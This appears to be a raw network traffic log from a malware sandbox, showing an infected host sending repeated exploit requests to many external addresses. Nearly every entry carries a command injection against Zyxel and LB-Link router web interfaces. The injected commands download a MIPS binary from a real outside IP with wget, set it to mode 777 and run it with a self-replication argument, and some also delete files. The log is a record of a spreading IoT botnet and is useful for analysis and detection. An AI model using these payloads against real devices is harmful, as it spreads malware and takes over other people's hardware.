                                                Jan 12, 2024 18:16:40.862411022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8972192.168.2.2335982175.104.26.203443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862431049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8973192.168.2.2343958121.201.180.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862481117 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8974192.168.2.2355530110.175.8.6443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862509012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8975192.168.2.2352434168.68.20.14443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862571955 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8976192.168.2.2357954218.131.143.1443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862605095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8977192.168.2.234538495.39.187.216443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862633944 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8978192.168.2.2358896107.9.147.207443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862680912 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8979192.168.2.235679082.38.162.125443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862720966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8980192.168.2.2353908102.29.9.238443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862781048 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8981192.168.2.2339536150.44.26.105443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862804890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8982192.168.2.2339840202.183.218.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862848043 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8983192.168.2.2348220194.98.108.237443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862878084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8984192.168.2.233734465.236.12.182443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862926006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8985192.168.2.235959464.192.76.29443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862953901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8986192.168.2.235293275.200.179.195443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.862979889 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8987192.168.2.2345326188.113.166.106443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.863017082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8988192.168.2.2348194184.170.131.200443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.863051891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8989192.168.2.2351206113.13.94.153443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.863090992 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8990192.168.2.2359338113.82.176.120443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.863131046 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8991192.168.2.2357878148.25.36.62443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.863151073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8992192.168.2.2348002105.54.77.201443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.863204002 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8993192.168.2.234300835.101.148.20443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.863231897 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8994192.168.2.2351840120.234.30.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.863271952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8995192.168.2.23551184.246.108.138443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.863323927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8996192.168.2.2332818102.191.138.255443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.863342047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8997192.168.2.235059666.206.106.176443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.866580963 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8998192.168.2.2353382121.79.198.232443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.866632938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                8999192.168.2.2354194212.15.219.180443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.866667032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9000192.168.2.235538227.37.76.33443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.866698980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9001192.168.2.234274853.162.75.37443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.866743088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9002192.168.2.233413871.116.8.185443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.866766930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9003192.168.2.2358632160.205.177.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.866808891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9004192.168.2.2345500104.195.136.2158080
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.882529020 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9005192.168.2.233835875.149.248.1138080
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:40.891083002 CET240OUTPOST /goform/set_LimitClient_cfg HTTP/1.1
                                                Cookie: user=admin
                                                Data Raw: 74 69 6d 65 31 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 74 69 6d 65 32 3d 30 30 3a 30 30 2d 30 30 3a 30 30 26 6d 61 63 3d 3b 72 6d 20 2d 72 66 20 6d 70 73 6c 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 31 30 33 2e 32 34 35 2e 32 33 36 2e 31 38 38 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 63 68 6d 6f 64 20 37 37 37 20 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 3b 20 2e 2f 73 6b 79 6c 6a 6e 65 2e 6d 70 73 6c 20 6c 62 6c 69 6e 6b 2e 73 65 6c 66 72 65 70 3b 72 6d 20 2a 6d 70 73 6c 2a 3b 0d 0a 0d 0a
                                                Data Ascii: time1=00:00-00:00&time2=00:00-00:00&mac=;rm -rf mpsl;wget http://103.245.236.188/skyljne.mpsl; chmod 777 skyljne.mpsl; ./skyljne.mpsl lblink.selfrep;rm *mpsl*;
                                                Jan 12, 2024 18:16:41.028727055 CET411INHTTP/1.1 404 Not Found
                                                Date: Fri, 12 Jan 2024 12:16:31 GMT
                                                Server: Webs
                                                X-Frame-Options: SAMEORIGIN
                                                Cache-Control: no-cache
                                                Content-Length: 166
                                                Content-Type: text/html
                                                Connection: keep-alive
                                                Keep-Alive: timeout=60, max=99
                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 44 6f 63 75 6d 65 6e 74 20 45 72 72 6f 72 3a 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 3c 68 32 3e 41 63 63 65 73 73 20 45 72 72 6f 72 3a 20 34 30 34 20 2d 2d 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 32 3e 0d 0a 3c 70 3e 43 61 6e 27 74 20 6f 70 65 6e 20 55 52 4c 3c 2f 70 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <!DOCTYPE html><html><head><title>Document Error: Not Found</title></head><body><h2>Access Error: 404 -- Not Found</h2><p>Can't open URL</p></body></html>


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9006192.168.2.2339742134.123.212.124443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.883832932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9007192.168.2.2337502179.47.85.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.883902073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9008192.168.2.2355388159.86.250.226443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.883945942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9009192.168.2.235381871.147.84.50443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.883971930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9010192.168.2.234866693.157.143.34443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.883999109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9011192.168.2.2341164160.159.231.13443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884035110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9012192.168.2.2341400167.254.14.25443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884063959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9013192.168.2.234438846.222.245.239443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884102106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9014192.168.2.2348760222.139.142.116443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884154081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9015192.168.2.234905044.115.252.82443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884177923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9016192.168.2.2346886182.76.221.80443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884252071 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9017192.168.2.2335704202.90.88.151443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884321928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9018192.168.2.23460464.1.0.18443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884365082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9019192.168.2.234536025.72.81.0443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884375095 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9020192.168.2.235998666.84.157.196443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884437084 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9021192.168.2.235826884.151.162.22443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884485006 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9022192.168.2.2351816209.184.129.154443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884531975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9023192.168.2.2342880145.85.73.173443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884556055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9024192.168.2.2352246137.227.145.8443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884603977 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9025192.168.2.2359294135.184.98.72443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884639978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9026192.168.2.2340366110.55.152.128443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884687901 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9027192.168.2.2354942118.148.153.100443
                                                TimestampBytes transferredDirectionData
                                                Jan 12, 2024 18:16:41.884727001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                9028192.168.2.234718466.235.165.174443
